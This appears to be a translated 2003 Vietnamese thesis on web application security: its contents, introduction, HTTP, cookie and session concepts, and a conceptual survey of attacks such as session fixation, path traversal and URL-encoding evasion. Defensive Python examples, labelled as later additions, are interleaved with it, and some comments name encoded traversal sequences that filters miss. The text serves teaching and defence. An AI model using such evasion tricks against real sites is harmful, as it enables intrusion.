LVCNTT-BaoMatWeb


  • 8/14/2019 LVCNTT-BaoMatWeb

    1/169

Faculty of Information Technology

MINISTRY OF EDUCATION AND TRAINING
UNIVERSITY OF NATURAL SCIENCES, HO CHI MINH CITY

FACULTY OF INFORMATION TECHNOLOGY

DEPARTMENT OF COMPUTER NETWORKS

GRADUATION THESIS

TOPIC:

RESEARCH ON SOME WEB APPLICATION SECURITY ISSUES ON THE INTERNET

Supervisor: M.Sc. Mai Van Cuong
Students: Nguyen Duy Thang - 9912074
          Nguyen Minh Thu - 9912156

ACADEMIC YEARS: 1999-2003


Acknowledgements

After nearly six months of effort, the thesis "Attack techniques and web application security on the Internet" has been more or less completed. Beyond our own efforts, we received a great deal of encouragement from the university, our teachers, our families and our friends.

First of all, we thank our parents, who always encouraged us and gave us every opportunity to study and to complete this graduation thesis.

We thank the teachers of the University of Natural Sciences for the valuable knowledge they passed on to us throughout our studies. In particular, we express our sincere and deep gratitude to Mr. Mai Van Cuong, who devotedly guided and helped us while we worked on this thesis.

Thanks to all the friends who have encouraged and helped us during our studies and in completing this graduation thesis.


Comments


TABLE OF CONTENTS

INTRODUCTION ........ 7
Organization of the thesis ........ 9
PART ONE: THEORETICAL BACKGROUND ........ 11
Chapter 1: Introduction to web applications ........ 12
I. THE CONCEPT OF A WEB APPLICATION ........ 13
II. HOW A WEB APPLICATION OPERATES ........ 16
Chapter 2: Related concepts and terminology ........ 18
I. HACKER ........ 19
II. HTTP HEADER ........ 19
III. SESSION ........ 21
IV. COOKIE ........ 22
V. PROXY ........ 25
Chapter 3: Brief overview of web application attack techniques ........ 26
I. WEB ACCESS CONTROL ........ 27
I.1. Entering the system through a back door ........ 27
II. SESSION TAKEOVER ........ 27
II.1. Session fixation ........ 27
II.2. Session hijacking ........ 27
III. EXPLOITING WEAKNESSES IN INPUT VALIDATION ........ 28
III.1. Client-side validation ........ 28
III.2. Buffer overflow ........ 28
III.3. URL encoding ........ 28
III.4. Meta-characters ........ 29
III.5. Path traversal ........ 29
III.6. Injecting code that runs in the victim's browser ........ 29
III.7. OS command injection ........ 29


III.8. SQL injection ........ 30
III.9. Server-side includes ........ 30
III.10. Null characters ........ 30
III.11. Parameter manipulation ........ 30
IV. INFORMATION DISCLOSURE ........ 31
V. DENIAL OF SERVICE ........ 31
PART TWO: WEB APPLICATION ATTACK TECHNIQUES AND SECURITY ........ 33
Chapter 4: Parameter manipulation ........ 34
I. URL MANIPULATION ........ 35
I.1. Concept ........ 35
I.2. Some countermeasures ........ 36
II. MANIPULATING HIDDEN FORM FIELDS ........ 36
II.1. Concept ........ 36
II.2. Some countermeasures ........ 38
III. COOKIE MANIPULATION ........ 39
III.1. Concept ........ 39
III.2. Some countermeasures ........ 40
IV. MANIPULATING THE HTTP HEADER ........ 41
IV.1. Concept ........ 41
IV.2. Some countermeasures ........ 42
Chapter 5: Injecting code that runs in the victim's browser (Cross-Site Scripting) ........ 43
I. THE CROSS-SITE SCRIPTING (XSS) ATTACK TECHNIQUE ........ 44
II. THE TRADITIONAL XSS ATTACK METHOD ........ 46
III. SOME WEBSITES FOUND TO HAVE XSS VULNERABILITIES ........ 50
IV. XSS ATTACKS USING FLASH ........ 51
V. COUNTERMEASURES ........ 54
Chapter 6: SQL injection ........ 56
I. THE CONCEPT OF SQL INJECTION ........ 57
II. INTRODUCTION TO THE DATABASE MODEL ........ 57


III. ATTACK METHODS ........ 58
III.1. The SQL injection attack technique ........ 58
III.2. Attacks based on the SELECT statement ........ 60
III.3. Attacks based on the HAVING clause ........ 62
III.4. Attacks based on the UNION operator ........ 62
III.5. Attacks based on the INSERT statement ........ 69
III.6. Attacks based on stored procedures ........ 70
III.7. Advanced techniques ........ 70
III.7.1. Strings without single quotes ........ 70
III.7.2. Second-order attacks ........ 71
III.7.3. Evading controls ........ 74
III.7.4. Using extended stored procedures ........ 75
III.7.4.1. Using the extended stored procedures built into SQL Server ........ 75
III.7.4.2. Using custom extended stored procedures ........ 76
III.7.4.3. Importing text files into tables ........ 77
IV. COUNTERMEASURES ........ 77
IV.1. Input validation ........ 78
IV.2. SQL Server lockdown ........ 81
Chapter 7: Session takeover (Session Management) ........ 83
I. OVERVIEW OF SESSION IDs ........ 84
II. SESSION FIXATION ........ 85
II.1. Attacking the session ID in URL parameters ........ 88
II.2. Attacking the session ID in hidden form fields ........ 89
II.3. Attacking the session ID in cookies ........ 89
II.4. Countermeasures ........ 91
III. SESSION HIJACKING ........ 92
III.1. Session ID prediction ........ 93
III.2. Session ID brute force ........ 93
III.3. Stealing the session ID with injected code ........ 94


III.4. Countermeasures ........ 94
III.5. The difference between session hijacking and session fixation ........ 94
Chapter 8: Buffer overflow ........ 97
I. CONCEPT ........ 98
II. MEMORY ORGANIZATION ........ 99
II.1. The stack ........ 100
II.2. Push and pop ........ 101
II.3. How functions work ........ 102
II.4. Shell code ........ 104
III. SOME WAYS BUFFER OVERFLOWS ARISE THROUGH WEB APPLICATIONS ........ 106
IV. COUNTERMEASURES ........ 106
Chapter 9: Denial of service (DoS) ........ 108
I. CONCEPT ........ 109
II. WAYS A SYSTEM CAN BE ATTACKED WITH DoS ........ 109
III. ATTACK TECHNIQUES ........ 110
III.1. The TCP three-way handshake ........ 110
III.2. Exploiting TCP for the classic SYN flood ........ 112
III.3. Bandwidth attacks ........ 113
III.3.1. Attack type 1 ........ 113
III.3.2. Attack type 2 ........ 113
III.4. Attacks on system resources ........ 117
IV. COUNTERMEASURES ........ 117
Chapter 10: Some other attack techniques ........ 119
I. URL ENCODING ........ 120
I.1. Concept ........ 120
I.2. Some countermeasures ........ 121
II. PATH TRAVERSAL ATTACKS ........ 121
II.1. Concept ........ 121


II.2. Some countermeasures ........ 122
III. NULL-CHARACTER ATTACKS ........ 123
III.1. Concept ........ 123
III.2. Some countermeasures ........ 123
IV. SERVER-SIDE LANGUAGES ........ 123
IV.1. Concept ........ 123
IV.2. Attack method ........ 125
IV.3. Countermeasures ........ 125
Chapter 11: Summary of a hacker's attack process ........ 127
I. GATHERING INFORMATION ON THE TARGET'S INFRASTRUCTURE ........ 128
II. SURVEYING THE WEB APPLICATION ........ 131
III. ATTACKING ........ 132
Chapter 12: Summary of countermeasures ........ 134
I. FOR NETWORK ADMINISTRATORS ........ 135
II. FOR WEB APPLICATION DESIGNERS ........ 137
III. FOR WEB APPLICATION USERS ........ 139
PART THREE: THE WEB CHECKER PROGRAM ........ 140
Chapter 13: The Web Checker program ........ 141
I. SPECIFICATION OF THE WEB CHECKER PROGRAM ........ 142
I.1. Overview ........ 142
I.2. Requirements ........ 142
I.2.1. Functional requirements ........ 142
I.2.2. Non-functional requirements ........ 143
II. ARCHITECTURE OF THE WEB CHECKER PROGRAM ........ 143
II.1. Architecture of the Web Checker program ........ 143
II.2. Communication between the program and the web server ........ 144
III. IMPLEMENTATION ........ 145
III.1. Implementation language ........ 145
III.2. Implementation approach ........ 145


III.2.1. Using a dialog-based interface model ........ 145
III.2.2. Using an ActiveX control (Microsoft Web Browser) ........ 145
III.2.3. Using the Windows Sockets 2 programming interface ........ 146
III.2.4. Main classes and functions implemented in the program ........ 146
III.3. Program description and usage ........ 151
III.3.1. Program screens ........ 151
III.3.2. Usage ........ 152
IV. PROGRAM EVALUATION ........ 153
IV.1. Achievements ........ 153
IV.2. Limitations ........ 153
CONCLUSION ........ 155
I. ACHIEVEMENTS ........ 156
II. FUTURE DIRECTIONS ........ 157
APPENDIX ........ 158


INTRODUCTION

Today, with the Internet widely available, organizations and individuals alike want to present information about themselves on the information highway and to carry out transactions online. The problem is that as the reach of web applications widens, the likelihood of bugs and of attacks grows with it, and these applications become targets for many attackers with different motives, sometimes simply to test their skill or to play a prank on someone else.

Along with the relentless growth of the Internet and of Internet services, the number of attacks on the Internet has grown exponentially. While the mass media talk more and more about the information access the Internet makes possible, the technical literature has begun to discuss at length how to secure and protect the data on computers connected to the Internet.

According to figures from CERT (Computer Emergency Response Team), the number of Internet attacks reported to that organization was fewer than 200 in 1989, about 400 in 1991, 1400 in 1993, 2241 in 1994, and 5315 in 2001.

These attacks target every computer present on the Internet: the computers of large companies such as AT&T and IBM, universities, government agencies, military organizations, banks, and so on. Some attacks have been enormous in scale (up to 100,000 computers attacked). Moreover, these figures are only the tip of the iceberg. A very large share of attacks go unreported, for many reasons, among them the fear of losing reputation, or simply because the system administrators are unaware of the attacks aimed at their systems.

A typical case is the attack on IBM's commercial software in March 2001, in which two hackers found a vulnerability in the application through which anyone with a web browser could obtain users' accounts, even the administrator's.

Not only has the number of attacks risen rapidly; the attack methods have become ever more soph�isticated and organized. On the other hand, administering network systems demands that the system administrator have solid knowledge of and experience with networked systems, so weaknesses in management create many opportunities for hackers to exploit.

Also according to CERT, the attacks of the 1988-1989 period mainly consisted of guessing user names and passwords (UserID/password) or using certain bugs in programs and operating systems (security holes) to disable protection mechanisms. Attacks in recent times, however, also include operations such as IP address spoofing, monitoring information transmitted over the network, taking over remote sessions (telnet or rlogin), and installing trojans or worms to monitor or control computers. The need to protect information on the Internet is therefore real, with the aims of protecting data, protecting users' information and protecting systems.

When security is discussed, most security experts concentrate on the safety of the network and the operating system. To protect a system, the method usually chosen is a firewall. However, according to a CSI/FBI statement, 78% of victim organizations used firewalls and 59% were attacked through the Internet; more specifically, according to the CSI/FBI Computer Crime and Security Survey, total losses from attacked web applications from 1997 to 2000 were 626 million US dollars.


Automated vulnerability scanners help web programmers a great deal, but they still cannot prevent everything, because web technology is developing rapidly (with most attention going to aesthetics and speed), which gives rise to many new defects. Attacks are not confined to the handful of techniques already discovered; they are flexible and multiply according to the mistakes of system administrators and application programmers.

This thesis was carried out with the aim of studying and analysing security vulnerabilities in web applications (together with demonstration programs) and, from that, proposing remedies. In parallel, the thesis also implements a program that automatically detects vulnerabilities in web applications, to help web programmers learn from experience and avoid mistakes when building applications.

Organization of the thesis

The thesis consists of 13 chapters divided into 3 parts:

Part one: THEORETICAL BACKGROUND

This part has 3 chapters:

+ Chapter 1: Introduction to web applications
+ Chapter 2: Some related concepts and terminology
+ Chapter 3: Overview of web application attack techniques

Part two: ATTACK TECHNIQUES AND COUNTERMEASURES

This part has 9 chapters, from chapter 4 to chapter 12. The first 7 chapters discuss attack techniques, and each ends with the countermeasures for that technique. Chapter 11 describes a hacker's attack process, and chapter 12 covers the most general countermeasures.


Part three: THE WEB CHECKER PROGRAM

This part consists of the final chapter, which presents and explains the program.

The thesis closes with a conclusion that summarizes the issues presented, some directions for future development, and the list of references.


PART ONE

THEORETICAL BACKGROUND


Chapter 1

INTRODUCTION TO WEB APPLICATIONS

Contents:
I. The concept of a web application
II. How a web application operates


CHAPTER 1: INTRODUCTION TO WEB APPLICATIONS

This thesis studies attack techniques against web sites and proposes countermeasures. The first chapter therefore briefly introduces some basic concepts, which are the foundation on which the later parts are built.

I. THE CONCEPT OF A WEB APPLICATION

A web application is a client/server application that uses the HTTP protocol to interact with users or with other systems.

The client used by a person is usually a web browser such as Internet Explorer or Netscape Navigator. It can also be a program acting as a user agent, behaving like an automated browser. Users send and receive information from the server by interacting with web pages. Such programs may be e-commerce sites, forums, e-mail services, and so on.

The techniques for building web applications are also evolving very quickly. Web applications used to be built with CGI (Common Gateway Interface) programs that ran on the web server and could connect to simple databases on the same machine. Today web applications are usually written in Java (or similar languages), run on distributed servers and connect to many data sources.

A web application typically has the following architecture:


Figure 1.I-1. Architecture of a web application

Presentation layer: this layer is responsible for displaying data to the user; it may also contain additional components that lay out the web page.

Application layer: this is where the web application does its processing. It handles the information the user requests, makes decisions, and sends the results to the presentation layer. This layer is usually implemented with programming technologies such as CGI, Java, .NET, PHP or ColdFusion, and deployed on servers such as IBM WebSphere, WebLogic, Apache or IIS.

Data layer: usually a database management system (DBMS) responsible for managing the data files and access rights.

Modelling the operation of a web application:


Figure 1.I-2. Operating model of a web application

Where:

Client (also called the browser): Internet Explorer, Netscape Navigator, ...
Server: Apache, IIS, ...
Database management system: SQL Server, MySQL, DB2, Access.

In addition, a commonly used solution for protecting a network is the firewall, which acts as the outer barrier of a network system: the main function of a firewall is to control the flow of information between computers. A firewall can be seen as an information filter; it decides whether one computer may access another, or whether one network may access another.

Firewalls are commonly used to:

- allow or deny services accessing the outside;
- allow or deny services from the outside accessing the inside;
- control which addresses may connect, and block addresses.

A firewall operates on IP packets and so controls access by the user's machine.

II. HOW A WEB APPLICATION OPERATES

First the browser sends a request to the web server using the basic commands of the HTTP protocol, GET, POST and so on. The server may then execute a program written in any of several languages, such as Perl or C/C++, or ask an interpreter to execute ASP, JSP or similar pages as the client requests. Depending on the tasks the installed program implements, it processes, computes, connects to the database, stores the information the client sent, and so on, and then returns to the client a stream of data formatted according to the HTTP protocol, which has two parts:

- The header describes the data packet and the attributes and state exchanged between the browser and the web server.
- The body is the data content the server sends to the client; it can be an HTML file, an image, a video clip or any other document.

In the model of figure 1.I-2, as far as the firewall is concerned the traffic between server and client is legitimate traffic. So if a hacker finds a vulnerability in the web application, the firewall is no longer of any use in stopping that hacker. As a result, attacks on network systems today increasingly concentrate on the mistakes (vulnerabilities) that web developers make while building applications, rather than attacking the network or operating system directly. Hackers can also, however, use web vulnerabilities to extend their attacks to other, unrelated systems.


Chapter 2

RELATED CONCEPTS AND TERMINOLOGY

Contents:
I. Hacker
II. HTTP header
III. Session
IV. Cookie
V. Proxy


CHAPTER 2: RELATED CONCEPTS AND TERMINOLOGY

I. HACKER

Hacker is a term used to refer to those who break into and damage network systems. Hackers are usually computer experts. Hackers do not create the weaknesses in a system, but they understand operating systems, database management systems, programming languages and so on very well, and they use that knowledge to seek out and exploit the vulnerabilities of networked systems. Some hackers stop at discovering bugs and reporting them to security specialists or to the program's developers; they are regarded as White Hats. Others use the vulnerabilities for unauthorized exploitation, for sabotage or for personal gain; they are regarded as Black Hats.

Because the term hacker is so widely used, this thesis uses "hacker" in place of "attacker" throughout.

II. HTTP HEADER

The HTTP header is the leading part (header) of the information the client and server send each other. The information the client sends to the server is called an HTTP request, and what the server sends to the client is an HTTP response. An HTTP header normally consists of several lines, each containing a parameter name and a value. Some parameters may be used in both request and response headers, while others are specific to one of the two. For example:

Request header:

GET /tintuc/homnay.asp HTTP/1.1
Accept: */*
Accept-Language: en-us
Connection: Keep-Alive
Host: localhost
Referer: http://localhost/lienket.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
Accept-Encoding: gzip, deflate

o The first line is the request line; it gives the request method (GET or POST), the requested address (/tintuc/homnay.asp) and the HTTP version (HTTP/1.1).
o Next come the parameters. For instance: Accept-Language gives the language used in the web page; Host gives the address of the server; Referer gives the address of the referring page.
o The header of an HTTP request ends with an empty line.

Response header:

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 13 Jul 2000 05:46:53 GMT
Content-Length: 2291
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQQGGGNCG=LKLDFFKCINFLDMFHCBCBMFLJ; path=/
Cache-control: private
...

o The first line is the status line; it gives the HTTP version in use (HTTP/1.1), the status code (200) and the status text (OK).
o Next come the parameters.
o Then an empty line marks the end of the header, followed by the body of the HTTP response.

The list of HTTP header parameters is given in appendix A.
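The structure just described (start line, one name/value pair per line, an empty line closing the header, then the body) is simple enough to parse directly. The following is an added example, not code from the thesis: it splits the request and response shown above, embedded here as constructed byte strings with CRLF line endings, and checks the declared Content-Length against the body actually received. The response's Content-Length has been set to 5 to match the short constructed body.

```python
"""Parse the head of an HTTP/1.x message: start line, header fields, body."""
from typing import Dict, List, Optional, Tuple

# Constructed from the request and response headers quoted in this section.
SAMPLE_REQUEST = (
    b"GET /tintuc/homnay.asp HTTP/1.1\r\n"
    b"Accept: */*\r\n"
    b"Accept-Language: en-us\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Host: localhost\r\n"
    b"Referer: http://localhost/lienket.asp\r\n"
    b"User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)\r\n"
    b"Accept-Encoding: gzip, deflate\r\n"
    b"\r\n"
)

SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: Microsoft-IIS/5.0\r\n"
    b"Date: Thu, 13 Jul 2000 05:46:53 GMT\r\n"
    b"Content-Length: 5\r\n"          # constructed: matches the 5-byte body below
    b"Content-Type: text/html\r\n"
    b"Set-Cookie: ASPSESSIONIDQQGGGNCG=LKLDFFKCINFLDMFHCBCBMFLJ; path=/\r\n"
    b"Cache-control: private\r\n"
    b"\r\n"
    b"hello"
)


def split_message(raw: bytes) -> Tuple[str, Dict[str, List[str]], bytes]:
    """Return (start_line, headers, body).

    The header section ends at the first empty line; the body is whatever
    follows and is returned untouched. Header names are lower-cased so lookups
    do not depend on the sender's capitalisation, and repeated names (several
    Set-Cookie lines, for instance) are kept as a list rather than overwritten.
    """
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("header section is not terminated by an empty line")
    lines = head.decode("iso-8859-1").split("\r\n")
    headers: Dict[str, List[str]] = {}
    for line in lines[1:]:
        name, colon, value = line.partition(":")
        if not colon or not name or name != name.strip():
            # No colon, empty name, or whitespace around the name: reject, do not guess.
            raise ValueError(f"malformed header field: {line!r}")
        headers.setdefault(name.lower(), []).append(value.strip())
    return lines[0], headers, body


def parse_request_line(start_line: str) -> Tuple[str, str, str]:
    """Split 'METHOD target HTTP/x.y' into (method, target, version)."""
    parts = start_line.split(" ")
    if len(parts) != 3 or not parts[2].startswith("HTTP/"):
        raise ValueError(f"malformed request line: {start_line!r}")
    return parts[0], parts[1], parts[2]


def parse_status_line(start_line: str) -> Tuple[str, int, str]:
    """Split 'HTTP/x.y code reason' into (version, code, reason)."""
    version, _, rest = start_line.partition(" ")
    code, _, reason = rest.partition(" ")
    if not version.startswith("HTTP/") or not code.isdigit():
        raise ValueError(f"malformed status line: {start_line!r}")
    return version, int(code), reason


def body_length_matches(headers: Dict[str, List[str]], body: bytes) -> Optional[bool]:
    """Compare Content-Length with the bytes actually received.

    Returns None when no Content-Length is present. A mismatch is worth logging:
    it is how truncated or deliberately malformed messages show up.
    """
    declared = headers.get("content-length")
    if declared is None:
        return None
    return int(declared[0]) == len(body)
```

Decoding the head as ISO-8859-1 rather than UTF-8 is deliberate: header bytes are not guaranteed to be valid UTF-8, and a parser that raises on odd bytes is easy to knock over.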

III. SESSION

HTTP is a generic, stateless, object-oriented protocol, meaning that HTTP does not store the working state between browser and server. This shortcoming makes some web applications difficult to build, because the server does not know what state the browser was in before. To solve this problem, web applications introduced the concept of a session, and the session ID is a string that authenticates a session. Some servers issue a session ID to a user when they view a page on the server.

To maintain a session, the session ID is usually stored in:

- a URL variable
- a hidden form field
- a cookie

A session exists only for a permitted period of time, configured on the server or by the running application. The server automatically releases the session to reclaim system resources.

IV. COOKIE

Cookies are small, structured pieces of data shared between the server and the user's browser.

Cookies are stored in small text files created by the application to store, retrieve and recognize information about users who have visited the web site and the areas they have passed through on the site. This information may include the user's name or identifier, password, preferences, habits and so on. The user's browser accepts the cookie and stores it on the machine's hard disk; however, browsers do not always support cookies, and whether they are stored also depends on the user accepting that storage.

On later visits to that web site, the application can reuse the information in the cookie (such as the login details for Yahoo! Messenger) so the user does not have to log in again or supply the other information a second time.

Cookies are classified along two axes, secure/non-secure and persistent/non-persistent, giving four kinds of cookie:

- Persistent and Secure
- Persistent and Non-Secure
- Non-Persistent and Secure
- Non-Persistent and Non-Secure

Persistent cookies are stored as .txt files (for example, Netscape Navigator stores all cookies in a single file cookie.txt, whereas Internet Explorer stores many *.txt files, one cookie per file) on the client machine for a fixed period of time.

Non-persistent cookies are held in the client machine's RAM and are destroyed when the web page is closed or when the page sends an instruction to delete them.

Secure cookies can only be sent over HTTPS (SSL).

Non-secure cookies can be sent over either HTTPS or HTTP. In effect, for a secure cookie the server provides a protected transport.

The components of a cookie are:

Domain          Flag   Path  Secure  Expiration  Name    Value
www.redhat.com  FALSE  /     FALSE   1154029490  Apache  64.3.40.151.16018996349247480

Domain: the domain name of the web site that created the cookie (www.redhat.com in the example above).

Flag: TRUE/FALSE - determines whether other hosts in the same domain may access the cookie.

Path: the range of addresses that may access the cookie. For example, if the path is /tracuu then addresses in the /tracuu directory and all of its subdirectories, such as /tracuu/baomat, may access this cookie. If the value is / then the cookie can be accessed from every address in the domain of the site that created it.

Secure: TRUE/FALSE - determines whether this is a secure cookie, that is, whether the connection uses SSL.

Expiration: the cookie's expiry time, counted in seconds from 00:00:00 GMT on 01/01/1970. If this value is not set, the browser treats the cookie as non-persistent, keeps it only in RAM and deletes it when the browser is closed.

Name: the variable name (Apache in this case).

Value: for the cookie created above, the value of Apache is 64.3.40.151.16018996349247480, the expiry date is 27/07/2006, and the domain is http://www.redhat.com.

For example, the following directive in an HTTP header creates a cookie:

Set-Cookie:Apache="64.3.40.151.16018996349247480"; path="/"; domain="www.redhat.com"; path_spec; expires="2006-07-27 19:39:15Z"; version=0

Netscape (NS) cookies are kept in a single file Cookies.txt, at the path C:\Program Files\Netscape\Users\UserName\Cookies.txt.

IE cookies are stored as many files, one cookie per file, in [C:]\Documents and Setting\[username]\Cookies (Windows 2000); on Windows 9x the cookies directory is [C:]\Windows\cookies.

The maximum size of a cookie is 4 KB. The maximum number of cookies per domain is 20.

A cookie that is destroyed as soon as the browser is closed is called a session cookie.
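The seven-column layout above is the Netscape cookie-file format, with the fields separated by tabs. As an added example, not code from the thesis, the block below parses one such line (constructed from the www.redhat.com values in the table), converts the epoch expiration to a date, rebuilds the equivalent Set-Cookie header, and lists the attributes a reviewer would question if this cookie carried a session identifier.

```python
"""Parse Netscape-format cookie lines (the seven fields described above)."""
import email.utils
from dataclasses import dataclass
from datetime import datetime, timezone
from typing import List, Optional

# Constructed sample: one tab-separated line, field order as in the table above.
SAMPLE_LINE = "www.redhat.com\tFALSE\t/\tFALSE\t1154029490\tApache\t64.3.40.151.16018996349247480"


@dataclass
class Cookie:
    domain: str
    domain_wide: bool   # the "Flag" column: may other hosts in the domain read it
    path: str
    secure: bool
    expiration: int     # seconds since 1970-01-01 00:00:00 UTC; 0 means a session cookie
    name: str
    value: str

    def is_persistent(self) -> bool:
        return self.expiration != 0

    def expires_at(self) -> Optional[datetime]:
        if not self.is_persistent():
            return None
        return datetime.fromtimestamp(self.expiration, tz=timezone.utc)


def parse_cookie_line(line: str) -> Cookie:
    """Split one cookie-file line into its fields, rejecting malformed rows."""
    fields = line.rstrip("\n").split("\t")
    if len(fields) != 7:
        raise ValueError(f"expected 7 tab-separated fields, got {len(fields)}")
    domain, flag, path, secure, expiration, name, value = fields
    if flag not in ("TRUE", "FALSE") or secure not in ("TRUE", "FALSE"):
        raise ValueError("Flag and Secure must be TRUE or FALSE")
    if not expiration.isdigit():
        raise ValueError("Expiration must be a non-negative integer")
    return Cookie(domain, flag == "TRUE", path, secure == "TRUE", int(expiration), name, value)


def to_set_cookie(cookie: Cookie) -> str:
    """Rebuild the Set-Cookie header value that would produce this stored cookie."""
    parts = [f"{cookie.name}={cookie.value}", f"Path={cookie.path}", f"Domain={cookie.domain}"]
    expiry = cookie.expires_at()
    if expiry is not None:
        # RFC 1123 date, locale-independent, as browsers expect in Expires=
        parts.append("Expires=" + email.utils.format_datetime(expiry, usegmt=True))
    if cookie.secure:
        parts.append("Secure")
    return "; ".join(parts)


def audit(cookie: Cookie) -> List[str]:
    """Attributes worth questioning if the cookie carries a session identifier."""
    findings = []
    if not cookie.secure:
        findings.append("not Secure: sent over plain HTTP as well as HTTPS")
    if cookie.path == "/":
        findings.append("path is /: readable by every page in the domain")
    if cookie.is_persistent():
        findings.append("persistent: survives on disk after the browser closes")
    return findings
```

The parser insists on exactly seven fields and on TRUE/FALSE literals rather than silently coercing, because a cookie store is an authentication artifact: a line that does not parse should be dropped, not guessed at.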

V. PROXY

A proxy gives users Internet access through a special protocol, or set of protocols, implemented on a dual-homed host or bastion host. The user's client programs go through the intermediate proxy server in place of the real server the user wants to communicate with.

The proxy server examines requests from the client and decides whether or not to fulfil them; if a request is accepted, the proxy server connects to the real server on the client's behalf and continues to forward the client's requests to the server and the server's replies to the client. The proxy server is thus an intermediate bridge between server and client.


Chapter 3

BRIEF OVERVIEW OF WEB APPLICATION ATTACK TECHNIQUES

Contents:
I. Web access control
II. Session takeover
III. Exploiting weaknesses in input validation
IV. Information disclosure
V. Denial of service


CHAPTER 3: BRIEF OVERVIEW OF WEB APPLICATION ATTACK TECHNIQUES

The following are brief descriptions of web application attack techniques, classified by the degree of harm they cause to the application.

I. WEB ACCESS CONTROL

I.1. Entering the system through a back door

While designing an application, its developers may install a back door so that they can enter the system easily later on.

II. SESSION TAKEOVER (Session Management)

II.1. Session fixation

An attack technique that lets a hacker impersonate a legitimate user by sending a valid session ID to the user; once the user has logged in to the system successfully, the hacker reuses that session ID and becomes, in effect, the legitimate user.

II.2. Session hijacking

An attack technique that lets a hacker impersonate a legitimate user after the victim has logged in to the system, by decoding the victim's session ID stored in a cookie, a URL parameter or a hidden form field.
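Both techniques above, and the session mechanics from chapter 2, come down to how the server issues and accepts session IDs. The following is an added example, not code from the thesis: a server-side session table that never adopts an ID it did not issue, rotates the ID at login so a pre-planted one becomes worthless (the fixation defence), generates IDs from the OS random source so they cannot be predicted or enumerated (the hijacking concern), and expires idle sessions as the text describes. The idle timeout and the injectable clock are assumptions made so the behaviour can be exercised without waiting.

```python
"""Server-side session store resistant to fixation and to ID guessing."""
import secrets
import time
from dataclasses import dataclass, field
from typing import Callable, Dict, Optional


@dataclass
class Session:
    user: Optional[str] = None
    created: float = 0.0
    last_seen: float = 0.0
    data: dict = field(default_factory=dict)


class SessionStore:
    def __init__(self, idle_timeout: float = 1800.0,
                 clock: Callable[[], float] = time.time):
        self._sessions: Dict[str, Session] = {}
        self._idle_timeout = idle_timeout
        self._clock = clock  # injectable for tests; time.time in production

    def create(self) -> str:
        # 256 bits from the OS CSPRNG: not predictable, not feasibly enumerable.
        sid = secrets.token_urlsafe(32)
        now = self._clock()
        self._sessions[sid] = Session(created=now, last_seen=now)
        return sid

    def lookup(self, sid: Optional[str]) -> Optional[Session]:
        """Return the live session for a presented ID, or None.

        An ID this store never issued is simply unknown, however it arrived
        (URL variable, hidden field or cookie). The caller then calls create()
        and sets its own ID instead of adopting the presented one: that is the
        first half of the fixation defence.
        """
        if sid is None or sid not in self._sessions:
            return None
        session = self._sessions[sid]
        now = self._clock()
        if now - session.last_seen > self._idle_timeout:
            del self._sessions[sid]  # expired: release it, as the text describes
            return None
        session.last_seen = now
        return session

    def login(self, sid: Optional[str], user: str) -> str:
        """Authenticate and return a brand-new ID.

        Rotating the ID at login is the second half of the fixation defence:
        whatever ID the browser held before authenticating, issued by this
        server or planted by someone else, stops working immediately.
        """
        old = self.lookup(sid)
        new_sid = self.create()
        fresh = self._sessions[new_sid]
        if old is not None:
            fresh.data.update(old.data)    # keep pre-login state such as a cart
            self._sessions.pop(sid, None)  # invalidate the pre-login ID
        fresh.user = user
        return new_sid

    def logout(self, sid: str) -> None:
        self._sessions.pop(sid, None)
```

The store is deliberately indifferent to where the ID was carried; the transport-specific concerns (URL, hidden field, cookie) are the subject of chapter 7.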

III. EXPLOITING WEAKNESSES IN INPUT VALIDATION

The hacker uses input fields to send in an arbitrary piece of code, making the system execute that code or break down completely.

III.1. Client-side validation

Because browser-side languages (JavaScript, VBScript, ...) run in the browser, the hacker can modify the source code and so disable the checks.

III.2. Buffer overflow

A quantity of data larger than the space allocated for it is sent to the application, so that instead of executing its next intended instruction the application executes arbitrary code the hacker has placed in the system. This is more serious still if the application is configured to run with root privileges on the system.

III.3. URL encoding

Taking advantage of the standard encoding of special characters in URLs, the hacker encodes the illegal characters, those that scripting-language checks look for, in order to get past that control.

III.4. Meta-characters

Using special characters (described in more detail in the appendix), the hacker can insert into the data being sent characters that belong to a command string, such as those used in the XSS technique or the -- sequence in SQL, in order to get a command executed.

III.5. Path traversal

A method that exploits the path used to fetch a file in a URL, so that the result returned to the browser lets the hacker obtain the contents of any file on the system.
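III.3 and III.5 fail for the same reason: the server checks the path before it has fully decoded it, or checks it without normalising it. The block below is an added example, not code from the thesis; it decodes a requested path until it stops changing (so double-encoded input does not slip through), rejects embedded NUL bytes, normalises the result and only then checks that it still lies under the web root. The web root /var/www is an assumed value, and the functions do pure path arithmetic, so nothing on disk is touched.

```python
"""Decode a URL path fully, normalise it, then confirm it stays inside the web root."""
import posixpath
from typing import Optional
from urllib.parse import unquote

WEB_ROOT = "/var/www"  # assumed for the example


def fully_decode(value: str, max_rounds: int = 3) -> str:
    """Apply percent-decoding until the string stops changing.

    A check that looks for ".." before decoding never sees "%2e%2e"; a check
    that decodes once never sees "%252e%252e". Repeating with a cap handles
    layered encodings without letting a hostile string loop forever.
    """
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return decoded
        value = decoded
    raise ValueError("too many layers of URL encoding")


def resolve_under_root(requested: str, web_root: str = WEB_ROOT) -> Optional[str]:
    """Return the normalised file path, or None if it would leave web_root."""
    try:
        path = fully_decode(requested)
    except ValueError:
        return None
    if "\x00" in path:
        return None  # a NUL can truncate the path in a C-based file API
    root = posixpath.normpath(web_root)
    # normpath collapses "a/./b", "a//b" and, crucially, "a/../b" before we compare.
    candidate = posixpath.normpath(posixpath.join(root, path.lstrip("/")))
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    return candidate
```

The comparison is against `root + "/"`, not `root`, so that a sibling directory such as `/var/www2` is not mistaken for a location inside `/var/www`.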

III.6. Injecting code that runs in the victim's browser (Cross-Site Scripting)

